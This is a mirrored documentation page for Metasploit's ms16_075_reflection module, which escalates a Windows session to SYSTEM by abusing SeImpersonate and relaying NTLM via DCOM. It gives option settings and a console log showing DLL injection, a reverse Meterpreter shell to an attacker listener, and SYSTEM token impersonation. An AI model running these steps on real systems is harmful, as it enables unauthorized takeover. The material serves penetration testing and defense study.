CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/ms16_reflection.md
Views: 1904

Introduction

This module will abuse the SeImperonsate privilege commonly found in services due to the requirement to impersonate a client upon authentication. As such it is possible to impersonate the SYSTEM account and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM attack at which intercepts the hash and relay responses from RPC to be able to establish a handle to a new SYSTEM token. Some caveats : Set your target option to match the architecture of your Meterpreter session, else it will inject the wrong architecture DLL into the process of a separate architecture. Additionally, after you have established a session, you must use incognito to imperonsate the SYSTEM Token.

Usage

You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the payload and session options, in addition to architecture.

Your user at which you are trying to exploit must have SeImpersonate privileges.

The module has a hardcoded timeout of 20 seconds, as the attack may not work immediately and take a few seconds to start. Also, check to make sure port 6666 is inherently not in use else the exploit will not run properly

Scenarios

  Name Current Setting Required Description
   ---- --------------- -------- -----------
   SESSION 48 yes The session to run this module on. Payload options 
(windows/x64/meterpreter/reverse_tcp):
   Name Current Setting Required Description
   ---- --------------- -------- -----------
   EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, 
process, none)
   LHOST ens3 yes The listen address (an interface may be specified)
   LPORT 3312 yes The listen port Exploit target:
   Id Name
   -- ----
   1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run 
[*] Started reverse TCP handler on -snip-:3312 [*] Launching notepad to 
host the exploit... [+] Process 3564 launched. [*] Reflectively 
injecting the exploit DLL into 3564... [*] Injecting exploit into 
3564... [*] Exploit injected. Injecting payload into 3564... [*] Payload 
injected. Executing exploit... [+] Exploit finished, wait for (hopefully 
privileged) payload execution to complete. [*] Sending stage (206403 
bytes) to -snip- [*] Meterpreter session 49 opened (-snip-:3312 -> 
-snip-:55306) at 2018-08-03 01:54:18 -0400 meterpreter > load incognito 
Loading extension incognito...Success. meterpreter > impersonate_token 
'NT AUTHORITY\SYSTEM' [-] Warning: Not currently running as SYSTEM, not 
all tokens will be available
             Call rev2self if primary process token is SYSTEM [-] No 
delegation token available [+] Successfully impersonated user NT 
AUTHORITY\SYSTEM meterpreter > getsystem -t 1 ...got system via 
technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter >